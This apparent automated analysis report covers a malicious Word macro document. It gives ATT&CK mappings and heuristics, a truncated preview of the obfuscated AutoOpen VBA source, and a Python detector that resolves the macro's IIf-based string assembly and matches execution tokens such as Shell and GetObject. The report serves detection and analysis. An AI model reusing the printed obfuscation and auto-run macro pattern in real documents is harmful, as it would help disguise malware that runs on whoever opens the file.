Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document (the extracted module is the template-derived ThisDocument module) whose VBA project defines an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The macro calls GetObject, which lets VBA obtain a COM object by moniker or ProgID and is a common way for a macro to reach script or shell execution; it is most likely used to download and run a second-stage payload, although the report does not show the resolved target. The visible part of the source is almost entirely junk (loops over Fix/Log/Rnd/Exp, Debug.Print and InStr calls with randomized identifiers) around incremental string assembly of the form var = var + IIf((287 + 574) = 861, "sc", "fU"), where the arithmetic predicate is always constant, so the real strings only exist once the fragments are concatenated at run time. The GetObject call itself lies beyond the preview shown below, deeper in the 51 KB of extracted source. AutoOpen plus GetObject is what maps the sample to T1059.005; the T1566.001 mapping is an inference from the file type, since the analyzer sees the document but not how it was delivered.
Heuristics (7)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Malware.Generic-6666849-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Generic-6666849-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | The VBA project defines an AutoOpen subroutine, which Word runs automatically when the document is opened |
| GetObject call | high | OLE_VBA_GETOBJ | The macro calls GetObject, which resolves a moniker or ProgID to a COM object and is a common route from a macro to script or shell execution |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body) |

Two caveats on this list. The WordBasic marker's description ("no modern VBA project was recovered") is contradicted by the VBA project that was in fact extracted below, so that finding adds nothing beyond OLE_VBA_AUTOOPEN here. The single embedded URL is the DrawingML XML namespace identifier that every modern Office file carries; it is not a network indicator and should not be treated as a contact address or added to a blocklist.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51484 bytes | f463d9565277f26af533f7dd403ae7398a3a4305afda9a9fa09d29545936a184 |
Preview script (first 1,000 lines of the extracted script; the copy on this page is cut off partway through AutoOpen)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub vAFYCOQOxYFEfoREloWAjI()
Dim RUvEGeKuvojOqaHOQ
For RUvEGeKuvojOqaHOQ = 4 To 12
Dim WogUiELYluRUh
WogUiELYluRUh = Fix(1131)
Next
lIpunEcOgUJOCakyvIRot = InStr("aYiOnUbyxIwoJeJAZYmE", "aYiOnUbyxIwoJeJAZYmEaYiOnUbyxIwoJeJAZYmE")
FAlAZoRyayTFiVZ = 15321
Dim PzAqBELuXanAhI
For PzAqBELuXanAhI = 3 To 13
Dim deGApyDOKYteJAVYZaBobej
deGApyDOKYteJAVYZaBobej = Fix(7188)
Next
Dim rudAluqAFaMyjIJU
For rudAluqAFaMyjIJU = 5 To 10
Dim zeseKYaezevELy
zeseKYaezevELy = Fix(99113)
Next
loiYDaFlOKA = 12764
End Sub
Sub AutoOpen()
Dim paXurACIZiJYZo
paXurACIZiJYZo = Log(3)
paXurACIZiJYZo = paXurACIZiJYZo + Log(11)
QDUmOlySod = Val("40571.3") & "zeRAnaGOaaD"
On Error Resume Next
Dim CEdiDAGulojASo
For CEdiDAGulojASo = 3 To 10
Dim RATOwECofaaO
RATOwECofaaO = Fix(63828)
Next
QObesUZUWEVY = InStr("qOBepOgAjUtYNIPAh", "qOBepOgAjUtYNIPAhqOBepOgAjUtYNIPAh")
Dim xapekakYvIDYvofoM
Dim hPonAToVunOpIPuQO
hPonAToVunOpIPuQO = Log(5)
hPonAToVunOpIPuQO = hPonAToVunOpIPuQO + Log(13)
Debug.Print "CuNoGeLiNeZrEmIVOcAd"
xapekakYvIDYvofoM = Log(1)
xapekakYvIDYvofoM = xapekakYvIDYvofoM + Log(11)
Debug.Print "VACIQiBeiAqoDUiotOqiwUNU"
Dim toNOnyGopgOlyHYpidywO
For toNOnyGopgOlyHYpidywO = 8 To 10
Dim VuDIitIFOP
VuDIitIFOP = Fix(86172)
Next
Dim PydAXeaOwAwOMeF
For PydAXeaOwAwOMeF = 6 To 13
Dim xoHazelEDaliBa
For xoHazelEDaliBa = 5 To 13
Dim TXIfEJuFOSAKudIByWfAm
TXIfEJuFOSAKudIByWfAm = Fix(54271)
Next
FAiIQITOJYRAtYzesedoaIQa = InStr("fOOQoRoxuTS", "fOOQoRoxuTSfOOQoRoxuTS")
Dim hYBIperoGaRefyha
Dim BoJybOmahUNYQ
For BoJybOmahUNYQ = 2 To 13
Dim juruTEGUTKi
juruTEGUTKi = Fix(4823)
Next
Dim jaairEQEzoPxE
jaairEQEzoPxE = Rnd(138)
If jaairEQEzoPxE > 85902 Then
jaairEQEzoPxE = Exp(8)
End If
hYBIperoGaRefyha = Fix(35157)
Next
Dim ieioNaJtTYfYgYW
ieioNaJtTYfYgYW = Rnd(119)
If ieioNaJtTYfYgYW > 21140 Then
ieioNaJtTYfYgYW = Exp(9)
End If
Dim wiJuxiCmeLeveiUgYaJI
For wiJuxiCmeLeveiUgYaJI = 2 To 11
Dim yLazoMUBUmAJIkExGAViCO
yLazoMUBUmAJIkExGAViCO = Fix(51354)
Next
Debug.Print "JIJEjeFUzySueZO"
Dim tANAZiDNUguauteTuca
Debug.Print "KEbYpyiedYF"
DilIDruMAfAXUxOKuQAsop = Val("77149.4") & "mytItajuKAWEnefEcA"
For tANAZiDNUguauteTuca = 3 To 11
hEGOpyZOlAzEWorYv = Val("54294.9") & "GywIDeCEaIsoBi"
Debug.Print "pyCiByTAXIsokyRYW"
Dim rAxeDoFOgaqunF
Dim SeRbUSeqIrofyKIqi
For SeRbUSeqIrofyKIqi = 10 To 11
Dim mEaYNUAloLYSYZe
mEaYNUAloLYSYZe = Fix(32912)
Next
rAxeDoFOgaqunF = Fix(21906)
Dim dUwUvUbYLagErujePio
dUwUvUbYLagErujePio = Log(6)
dUwUvUbYLagErujePio = dUwUvUbYLagErujePio + Log(12)
Next
QuqoRRotTuCUR = InStr("GekUQUMENeqaP", "GekUQUMENeqaPGekUQUMENeqaP")
Dim LeFYJepIwalEJInRuNexO
LeFYJepIwalEJInRuNexO = Rnd(1210)
If LeFYJepIwalEJInRuNexO > 30299 Then
LeFYJepIwalEJInRuNexO = Exp(10)
End If
diTUvaMiNelAtew = ""
Dim junoQAVomOjoGyRUZ
junoQAVomOjoGyRUZ = Log(6)
junoQAVomOjoGyRUZ = junoQAVomOjoGyRUZ + Log(11)
Debug.Print "bOxyJOZYlIxAxidvAsiH"
rDIvGOiunAVuBYH = Val("78447.2") & "ExOqIneqYtotiwUZuMIfuTi"
vEtOPEwoZYRaN = 1924
Debug.Print "GARUPuWEVaFOMaikETObA"
fyFIaekiDezYHYleMObYXyp = Val("66192.5") & "DYZVuaEdotUwEjvuvoly"
Dim ledHiiTat
ledHiiTat = Rnd(123)
If ledHiiTat > 10914 Then
ledHiiTat = Exp(3)
End If
ceQaTATAsynONeByxzOaE = InStr("cIRatbizInYqoHUj", "cIRatbizInYqoHUjcIRatbizInYqoHUj")
diTUvaMiNelAtew = diTUvaMiNelAtew + IIf((287 + 574) = 861, "sc", "fU")
Dim wivoPaGyXUBeLoxoseHe
wivoPaGyXUBeLoxoseHe = Log(9)
wivoPaGyXUBeLoxoseHe = wivoPaGyXUBeLoxoseHe + Log(12)
vLyCewipyiUnYXEko = 59150
jUPIGikEWODy = Val("76014.10") & "KKxEaufOniYbkoi"
CyLusekymaaiwAtone = InStr("jYRujiruKiNunuMUjoH", "jYRujiruKiNunuMUjoHjYRujiruKiNunuMUjoH")
Dim VIsEREfeZYPgeayRsAmE
VIsEREfeZYP
```

... (truncated)
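As an added example (not part of the original report and not the analyzer's own code), the following Python reproduces two of the checks above on decoded VBA source text: the auto-exec plus execution-token pairing behind OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC, and resolution of the constant-predicate IIf() string assembly that the preview shows at `diTUvaMiNelAtew = diTUvaMiNelAtew + IIf((287 + 574) = 861, "sc", "fU")`. The sample macro, the token lists and the function names are constructed for the demo; it scans extracted source such as olevba's output and does not parse compiled p-code.

```python
"""Source-level version of the report's macro checks (added example).

1. Auto-exec entry point + execution tokens: the pairing behind
   OLE_VBA_AUTOOPEN / OLE_VBA_GETOBJ and the p-code heuristic.
2. Resolution of IIf()-based string assembly with constant predicates, so
   tokens that only exist once the fragments are joined get scanned too.
Operates on decoded VBA text such as olevba's output; it does not parse p-code.
"""
import json
import re

# Names Word/VBA runs automatically (assumed list, not the analyzer's own).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Workbook_Open", "Auto_Open")
# Execution / object-creation primitives worth pairing with an auto-exec.
EXEC_TOKENS = ("Shell", "GetObject", "CreateObject", "WScript.Shell",
               "URLDownloadToFile", "ShellExecute")

# Constructed sample in the style of the preview above; NOT the real macros.bas.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
Dim RATOwECofaaO
RATOwECofaaO = Fix(63828)
On Error Resume Next
Debug.Print "JIJEjeFUzySueZO"
qOBepO = ""
qOBepO = qOBepO + IIf((287 + 574) = 861, "sc", "fU")
qOBepO = qOBepO + IIf((100 * 3) = 301, "zz", "ri")
qOBepO = qOBepO + IIf((40 - 13) = 27, "pt", "Qx")
kEpUZa = ""
kEpUZa = kEpUZa + IIf((5 + 5) = 10, "ws", "aa")
kEpUZa = kEpUZa + IIf((2 * 2) = 5, "bb", "cri")
kEpUZa = kEpUZa + IIf((9 - 1) = 8, "pt.sh", "ZZ")
kEpUZa = kEpUZa + IIf((1 + 1) = 3, "YY", "ell")
Set oBj = GetObject(qOBepO)
End Sub
'''

# Matches:  var = var + IIf((a op b) = c, "true-part", "false-part")
IIF_RE = re.compile(
    r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*IIf\(\s*\(?\s*(\d+)\s*([-+*])\s*(\d+)\s*\)?'
    r'\s*=\s*(\d+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)',
    re.IGNORECASE | re.MULTILINE)
OPS = {"+": lambda a, b: a + b, "-": lambda a, b: a - b, "*": lambda a, b: a * b}


def word_hits(tokens, text):
    """Tokens present as whole words; VBA is case-insensitive, so the scan is too."""
    return [t for t in tokens
            if re.search(r"\b" + re.escape(t) + r"\b", text, re.IGNORECASE)]


def resolve_iif_strings(src):
    """Evaluate each constant IIf predicate and append the chosen fragment to
    its target variable. Only + - * on integer literals are evaluated; nothing
    from the macro is executed."""
    out = {}
    for var, a, op, b, c, yes, no in IIF_RE.findall(src):
        out[var] = out.get(var, "") + (yes if OPS[op](int(a), int(b)) == int(c) else no)
    return out


def scan_macro(src):
    """Return the auto-exec/exec-token evidence for one VBA module."""
    autoexec = word_hits(AUTOEXEC_TOKENS, src)
    exec_raw = word_hits(EXEC_TOKENS, src)
    resolved = resolve_iif_strings(src)
    # Second pass over the reassembled strings: "wscript.shell" shows up here
    # although no single line of the source contains it.
    hidden = [t for t in word_hits(EXEC_TOKENS, "\n".join(resolved.values()))
              if t not in exec_raw]
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_raw,
        "resolved_strings": resolved,
        "hidden_exec_tokens": hidden,
        "suspicious": bool(autoexec) and bool(exec_raw or hidden),
    }


if __name__ == "__main__":
    # To run on the real artifact: scan_macro(open("macros.bas").read())
    print(json.dumps(scan_macro(SAMPLE_VBA), indent=2))
```

On the constructed sample the first pass finds only AutoOpen and GetObject; the resolver then yields "script" and "wscript.shell", and the second pass flags Shell and WScript.Shell that were invisible in the raw text. The resolver deliberately covers just the shape seen in the preview (integer arithmetic inside IIf); Chr()-built strings, Replace/StrReverse chains or predicates that read variables need their own handlers, and a p-code-only document still needs the compiled-stream check the analyzer describes.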